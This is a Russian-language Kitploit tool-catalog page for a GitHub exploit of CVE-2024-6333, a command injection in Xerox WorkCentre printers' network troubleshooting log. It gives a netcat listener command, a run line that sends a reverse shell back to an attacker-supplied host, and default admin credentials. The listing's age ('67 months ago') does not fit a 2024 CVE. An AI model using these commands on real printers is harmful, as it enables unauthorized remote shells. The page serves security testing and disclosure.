Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-6333 — Уязвимость аутентифицированного удалённого выполнения кода в принтерах Xerox WorkCentre через функцию журнала устранения неполадок сети. | Kitploit
Инструменты/GitHubGitHub/0xqrx/cve-2024-6333
Безопасность встроенных системЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеБезопасность оборудования и IoT
GitHub0xqrx/cve-2024-6333

CVE-2024-6333

Уязвимость аутентифицированного удалённого выполнения кода в принтерах Xerox WorkCentre через функцию журнала устранения неполадок сети.

Репозиторий
67 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-6333 - Аутентифицированное удалённое выполнение кода в Xerox

Аутентифицированное удалённое выполнение кода в принтерах Xerox WorkCentre через функцию журнала сетевой диагностики.

Описание

Функция журнала сетевой диагностики (/properties/security/network_troubleshooting_log.php) не очищает параметр сервера назначения (security.nwtroubleshoot.destination.server), что позволяет аутентифицированному администратору внедрять произвольные команды ОС. При запуске захвата сетевого журнала внедрённая полезная нагрузка выполняется как shell-команда, что приводит к удалённому выполнению кода.

Затронутые продукты

  • XEROX WorkCentre 6655 (протестировано на прошивке 073.110.019.14200)
  • Множество других моделей принтеров Xerox (см. бюллетень)

Ссылки

  • https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-code-execution-in-multiple-xerox-printers/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-6333

Требования

  • Python 3
  • Действительные учётные данные администратора на целевом принтере
  • Сетевой доступ к цели

Установка

root@kitploit:~
pip install -r requirements.txt

Использование

Запустите слушатель на вашей машине:

root@kitploit:~
nc -lvnp 8443

Запустите эксплойт:

root@kitploit:~
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443

Аргументы

Как это работает

  1. Выполняет аутентификацию в веб-интерфейсе принтера с использованием предоставленных учётных данных
  2. Останавливает все существующие сеансы журнала сетевой диагностики
  3. Внедряет полезную нагрузку reverse shell в поле сервера назначения
  4. Запускает захват сетевого журнала, выполняя полезную нагрузку
  5. Ожидает 30 секунд, затем отправляет команду очистки/остановки

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам является незаконным.

Скачать инструмент
АргументОбязательныйПо умолчаниюОписание
--targetДаЦелевой URL (например, https://192.0.2.1)
--lhostДаIP-адрес слушателя
--lportНет8443Порт слушателя
--userНетadminИмя пользователя администратора
--passwordНет1111Пароль администратора
--proxyНетURL прокси (например, http://127.0.0.1:8080)